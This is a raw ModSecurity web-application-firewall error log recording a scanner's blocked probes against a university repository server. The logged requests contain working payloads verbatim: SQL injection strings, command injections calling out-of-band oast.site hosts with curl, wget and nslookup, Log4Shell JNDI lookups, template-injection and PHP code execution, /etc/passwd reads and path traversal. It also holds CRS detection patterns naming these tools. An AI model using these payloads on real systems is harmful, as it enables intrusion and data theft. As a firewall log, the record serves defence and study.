[Tue Aug 29 11:31:52.460188 2023] [:error] [pid 1040] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/pages/doenterpagevariables.action"] [unique_id "ZO10uMCo-f0AAAQQyncAAAAy"]
[Tue Aug 29 11:31:52.587644 2023] [:error] [pid 1040] [client 143.42.78.27] ModSecurity: Rule 7fe1c606a5d0 [id "981243"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "245"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "repositoryfh.unla.ac.id"] [uri "/\\x04\\xd7\\x7f\\xbf\\x18\\xd8\\x7f\\xbf\\x18\\xd8\\x7f\\xbfd\\xb8\\x06\\b;{curl,http:/cjmn8l5jmimk2adbbnlgdt41knrjg1wmb.oast.site+-H+'User-Agent:+LGgfDE'};\\x04\\xd7\\x7f\\xbf\\x18\\xd8\\x7f\\xbf\\x18\\xd8\\x7f\\xbfd\\xb8\\x06\\b;{curl,http:/cjmn8l5jmimk2adbbnlg7huw9aomewka4.oast.site+-H+'User-Agent:+LGgfDE'};"] [unique_id "ZO10uMCo-f0AAAQQynsAAAAy"]
[Tue Aug 29 11:31:53.335045 2023] [:error] [pid 1037] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:id: ' AND (SELECT 7774 FROM (SELECT(SLEEP(6)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/classes/Master.php"] [unique_id "ZO10ucCo-f0AAAQNwJ0AAAAv"]
[Tue Aug 29 11:31:53.453259 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/pages/createpage.action"] [unique_id "ZO10ucCo-f0AAAQSWPUAAAA0"]
[Tue Aug 29 11:31:54.379999 2023] [:error] [pid 1038] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/pages/templates2/viewpagetemplate.action"] [unique_id "ZO10usCo-f0AAAQOv4UAAAAw"]
[Tue Aug 29 11:31:55.354515 2023] [:error] [pid 893] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/pages/createpage-entervariables.action"] [unique_id "ZO10u8Co-f0AAAN9sRQAAAAJ"]
[Tue Aug 29 11:31:56.316711 2023] [:error] [pid 994] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/template/custom/content-editor"] [unique_id "ZO10vMCo-f0AAAPiBncAAAAB"]
[Tue Aug 29 11:31:56.378982 2023] [:error] [pid 1036] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:mac. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:mac: wget http:/cjmn8l5jmimk2adbbnlgdptdx7b9gx8g3.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/goform/setmac"] [unique_id "ZO10vMCo-f0AAAQMrx0AAAAu"]
[Tue Aug 29 11:31:57.307546 2023] [:error] [pid 1060] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/templates/editor-preload-container"] [unique_id "ZO10vcCo-f0AAAQkBZwAAAAC"]
[Tue Aug 29 11:31:58.314940 2023] [:error] [pid 1018] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:s. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /${@ found within ARGS:s: /index/index/name/${@phpinfo()}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10vsCo-f0AAAP6NRYAAAAQ"]
[Tue Aug 29 11:31:58.348736 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/users/user-dark-features"] [unique_id "ZO10vsCo-f0AAAPDoAkAAAAP"]
[Tue Aug 29 11:31:59.320776 2023] [:error] [pid 854] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:deviceUdid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ()(\\x22 found within ARGS:deviceUdid: ${\\x22freemarker.template.utility.Execute\\x22?new()(\\x22cat /etc/hosts\\x22)}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/catalog-portal/ui/oauth/verify"] [unique_id "ZO10v8Co-f0AAANWgWUAAAAG"]
[Tue Aug 29 11:31:59.364683 2023] [:error] [pid 876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:timezone. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ` found within ARGS:timezone: `nslookup cjmn8l5jmimk2adbbnlg97fpmgcsdnf7i.oast.site`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/index.php/management/set_timezone"] [unique_id "ZO10v8Co-f0AAANsAXMAAAAD"]
[Tue Aug 29 11:32:04.440208 2023] [:error] [pid 876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:fields: * from wp_users-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/"] [unique_id "ZO10xMCo-f0AAANsAX4AAAAD"]
[Tue Aug 29 11:32:06.400832 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filter. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ')) $ found within ARGS:filter: ' pi(print($a='system')) $a('cat /etc/passwd') '"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/fuel/pages/select/"] [unique_id "ZO10xsCo-f0AAAQKOdwAAAAs"]
[Tue Aug 29 11:32:06.432912 2023] [:error] [pid 1041] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:subscribe_topic. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: union select found within ARGS:subscribe_topic: 1 union select 1 and sleep(6)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/forum/"] [unique_id "ZO10xsCo-f0AAAQR4-cAAAAz"]
[Tue Aug 29 11:32:07.320363 2023] [:error] [pid 1041] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/dfsms/index.php"] [unique_id "ZO10x8Co-f0AAAQR4-oAAAAz"]
[Tue Aug 29 11:32:08.303341 2023] [:error] [pid 1017] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:account_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:account_id: 2'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/dms/admin/accounts/payment_history.php"] [unique_id "ZO10yMCo-f0AAAP5mOoAAAAM"]
[Tue Aug 29 11:32:08.307780 2023] [:error] [pid 1084] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:cfg_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:cfg_id: ;id;#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/ajax/openvpn/del_ovpncfg.php"] [unique_id "ZO10yMCo-f0AAAQ83QAAAAAI"]
[Tue Aug 29 11:32:10.323028 2023] [:error] [pid 1037] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:action. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:action: ${jndi:ldap://${:-738}${:-475}}.${hostName}.uri.cjmn8l5jmimk2adbbnlgd1e7zhe873u76.oast.site/}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/solr/admin/collections"] [unique_id "ZO10ysCo-f0AAAQNwM0AAAAv"]
[Tue Aug 29 11:32:10.408876 2023] [:error] [pid 893] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:action. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:action: ${jndi:ldap://${:-738}${:-475}}.${hostName}.uri.cjmn8l5jmimk2adbbnlgyhe6jso488yhp.oast.site/}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/solr/admin/cores"] [unique_id "ZO10ysCo-f0AAAN9sS4AAAAJ"]
[Tue Aug 29 11:32:12.348861 2023] [:error] [pid 1063] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS_NAMES:ids[0,updatexml(0,concat(0xa,user()),0)]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: updatexml( found within ARGS_NAMES:ids[0,updatexml(0,concat(0xa,user()),0)]: ids[0,updatexml(0,concat(0xa,user()),0)]"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10zMCo-f0AAAQnF8kAAAAF"]
[Tue Aug 29 11:32:13.311731 2023] [:error] [pid 1085] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:<?xml version. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22?>< found within ARGS:<?xml version: \\x221.0\\x22 encoding=\\x22UTF-8\\x22?><language>$(cat /etc/passwd>webLib/x)</language>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/SDK/webLanguage"] [unique_id "ZO10zcCo-f0AAAQ9H0QAAAAK"]
[Tue Aug 29 11:32:13.337705 2023] [:error] [pid 854] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://cjmn8l5jmimk2adbbnlgkhidzxmuyk6y5.oast.site found within TX:1: cjmn8l5jmimk2adbbnlgkhidzxmuyk6y5.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10zcCo-f0AAANWgYYAAAAG"]
[Tue Aug 29 11:32:15.311923 2023] [:error] [pid 893] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:token. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../ found within ARGS:token: /../../../../../var/lib/tomcat8/webapps/cas/js/lib/buttons/fGh9o.jsp"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/cas/fileUpload/upload"] [unique_id "ZO10z8Co-f0AAAN9sT4AAAAJ"]
[Tue Aug 29 11:32:15.395749 2023] [:error] [pid 1084] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:syear. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:syear: 111'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/Side.php"] [unique_id "ZO10z8Co-f0AAAQ83RcAAAAI"]
[Tue Aug 29 11:32:16.327033 2023] [:error] [pid 876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:author: admin' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(md5(999999999),1,1),NULL,NULL,NULL,NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/author_posts.php"] [unique_id "ZO100MCo-f0AAANsAaAAAAAD"]
[Tue Aug 29 11:32:16.391491 2023] [:error] [pid 1036] [client 143.42.78.27] ModSecurity: XML parser error: XML: Failed parsing document. [hostname "repositoryfh.unla.ac.id"] [uri "/WebReport/ReportServer"] [unique_id "ZO100MCo-f0AAAQMr1cAAAAu"]
[Tue Aug 29 11:32:16.391529 2023] [:error] [pid 1036] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [hostname "repositoryfh.unla.ac.id"] [uri "/WebReport/ReportServer"] [unique_id "ZO100MCo-f0AAAQMr1cAAAAu"]
[Tue Aug 29 11:32:17.314809 2023] [:error] [pid 854] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:author: admin' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(md5(999999999),1,1),NULL,NULL,NULL,NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/cms/author_posts.php"] [unique_id "ZO100cCo-f0AAANWgZMAAAAG"]
[Tue Aug 29 11:32:18.376595 2023] [:error] [pid 1017] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:x. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xef\\xbf\\xbd'  found within ARGS:x: 11\\xef\\xbf\\xbd' union select 1,2,3,concat(0x3C2F613E20),5,6,7,md5(999999999),9 from qs_admin"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/plus/ajax_street.php"] [unique_id "ZO100sCo-f0AAAP5mRMAAAAM"]
